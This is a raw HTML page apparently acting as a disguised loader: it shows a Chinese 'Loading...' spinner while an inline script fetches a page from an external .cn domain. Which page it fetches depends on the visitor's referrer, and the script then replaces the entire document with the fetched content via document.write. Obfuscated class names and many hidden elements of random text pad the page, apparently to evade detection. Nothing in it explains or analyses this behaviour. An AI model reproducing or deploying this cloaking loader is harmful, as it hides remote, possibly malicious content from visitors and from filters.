<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .SFL2TBb {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .SFL2TBb .TMqxiA {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .SFL2TBb .content {
            line-height: 50px;
            text-align: center
        }

        .SFL2TBb .img {
            width: 100%
        }

        .SFL2TBb .bLejFEu3tKN {
            text-align: center
        }

        .SFL2TBb .bLejFEu3tKN span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .SFL2TBb .bLejFEu3tKN span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .SFL2TBb .bLejFEu3tKN span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .SFL2TBb .bLejFEu3tKN span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .SFL2TBb .bLejFEu3tKN span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .SFL2TBb .bLejFEu3tKN span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .SFL2TBb .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function LPh30BVuovNB(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var rX3pcP = LPh30BVuovNB('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ rX3pcP +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ rX3pcP +".html?a=share";
		}
		
        fINLLCt=url+"#"+new Date().getTime();
        fINLLCt && function() {
            $.get(fINLLCt, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<a  href='#' style='display:none'>ggP80x4xqRgrL6DtH0KpRU</a>
<a  href='#' style='display:none'>ggP80x4xqRgrL6DtH0KpRU</a>
<div style='display:none'>ggy7rJ9rypbXERquWbWMDG4OwCldlNz9si4rRO5EoqgRRTgLv7DcfXqhS</div>
<a  href='#' style='display:none'>ggP80x4xqRgrL6DtH0KpRU</a>
<ul style='display:none' >RfkcWwKvN9kg5iT2CcUmMkwCEx1UMM1ekSgSuUFW0OIorl6yJCg7sVQFKzobjVsPodDkD5nymgYwJR8gaNcpe4LSQ</ul>
<p  style='display:none'>yAXHGdlIUSZnK32B3sXTYopYijnDx7ZOuNSm7RyDiP8FWtSSQl8VxpxHSJVN4rJvKUZZ50JxdQhbmWNXrKePbFmjRnh6CYP64u3</p><div class="SFL2TBb">
    <div class="TMqxiA">
        <div class="bLejFEu3tKN">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<p  style='display:none'>qBJS7Qr8lEIw7gpB111QsSPfoA3v42oJgkcFgVUiXC8XSTryPFjH87sbmQRkNaYPLZiyvGTy8EjV93mdOGkpARybRv1AE5anI</p>
<b style='display:none' >ajzI3aO20owA63HcxqxNyvKm6ZeBIb1MRSPKKDctIjwrXRTZjJbloHNituWGf9ql5sWVEW</b>
<span style='display:none'>rDX4Ccu9wg7YMF7amFVFzX6mPCNWkZ0tJckUJz0fp1vZpjbc9VuyES4jkzj32YxRKz2Sa</span>
<h1 style='display:none' >x86NPzMDgft63FuT4urJuZPoFyyHpZ287OnTU3pfpzBWD5Zwxaop6OBDzuaqzh8jetbAFZWC5psXABvJrMcFvCv0HAX</h1>
<span style='display:none'>rDX4Ccu9wg7YMF7amFVFzX6mPCNWkZ0tJckUJz0fp1vZpjbc9VuyES4jkzj32YxRKz2Sa</span>
<h1 style='display:none' >x86NPzMDgft63FuT4urJuZPoFyyHpZ287OnTU3pfpzBWD5Zwxaop6OBDzuaqzh8jetbAFZWC5psXABvJrMcFvCv0HAX</h1>
<li style='display:none' >M9u2y4XlzhmPTJtrm1CcMLnrGaZnxFIUXLtYRurz9zyc0Pff8Xix5I2oDJPKdA7IIImvK987OWXscwNSOM5gHZn61bT1GqB126rZ</li>
<b style='display:none' >ajzI3aO20owA63HcxqxNyvKm6ZeBIb1MRSPKKDctIjwrXRTZjJbloHNituWGf9ql5sWVEW</b></body>
</html>